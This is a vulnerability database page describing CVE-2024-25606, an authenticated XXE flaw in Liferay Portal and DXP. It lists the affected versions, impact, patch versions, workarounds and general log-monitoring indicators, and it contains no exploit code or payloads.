Login Sign Up

CVE-2024-25606

8.0 HIGH
Denial of Service XXE

📋 TL;DR

This XXE vulnerability in Liferay Portal and DXP allows authenticated attackers with deployment permissions to read sensitive files or cause denial of service through XML parsing. It affects administrators and developers who can deploy portlets, widgets, or extensions.

💻 Affected Systems

Products:
  • Liferay Portal
  • Liferay DXP
Versions: Liferay Portal 7.2.0 through 7.4.3.7 and older unsupported versions; Liferay DXP 7.4 before update 4, 7.3 before update 12, 7.2 before fix pack 20 and older unsupported versions
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires attacker to have permission to deploy widgets/portlets/extensions

📦 What is this software?

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Digital Experience Platform by Liferay

View all CVEs affecting Digital Experience Platform →

Liferay Portal by Liferay

View all CVEs affecting Liferay Portal →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could read sensitive system files, configuration files, or internal network resources, potentially leading to full system compromise.

🟠

Likely Case

Unauthorized file disclosure of application configuration, user data, or system information accessible to the application server.

🟢

If Mitigated

Limited impact if proper access controls restrict deployment permissions to trusted administrators only.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires authenticated access with specific deployment permissions

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Liferay Portal 7.4.3.8+, Liferay DXP 7.4 update 4+, 7.3 update 12+, 7.2 fix pack 20+

Vendor Advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606

Restart Required: Yes

Instructions:

1. Download appropriate patch from Liferay customer portal. 2. Apply patch following Liferay's patching documentation. 3. Restart Liferay instance. 4. Verify version is updated.

🔧 Temporary Workarounds

Restrict deployment permissions

all

Limit who can deploy widgets/portlets/extensions to only essential administrators

Disable XML external entity processing

all

Configure XML parsers to disable external entity resolution

🧯 If You Can't Patch

  • Implement strict access controls to limit deployment permissions to trusted administrators only
  • Monitor deployment activities and audit logs for suspicious XML processing attempts

🔍 How to Verify

Check if Vulnerable:

Check Liferay version via Control Panel → Configuration → Server Administration → System Information

Check Version:

Check via Liferay Control Panel or examine liferay-portal.xml version property

Verify Fix Applied:

Verify version is updated to patched version and test XML processing functionality

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML parsing errors
  • File access attempts via XML parsing
  • Multiple deployment attempts by single user

Network Indicators:

  • XML payloads with external entity references in deployment requests

SIEM Query:

source="liferay" AND (message="*XML*" OR message="*deploy*" OR message="*parse*")

📊 Metadata

CVE ID: CVE-2024-25606
CVSS v3 Score: 8.0 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-611
Published: February 20, 2024
Last Updated: December 11, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-25606, you might also want to check these:

CVE-2022-22486 10.0

This CVE describes an XML External Entity (XXE) vulnerability in IBM Tivoli Workload Scheduler that ...

Same vulnerability type (CWE-611)
CVE-2025-30220 9.9

This XXE vulnerability in GeoServer's GeoTools Schema class allows attackers to read arbitrary files...

Same vulnerability type (CWE-611)
CVE-2023-27874 9.9

IBM Aspera Faspex 4.4.2 contains an XML external entity injection (XXE) vulnerability that allows au...

Same vulnerability type (CWE-611)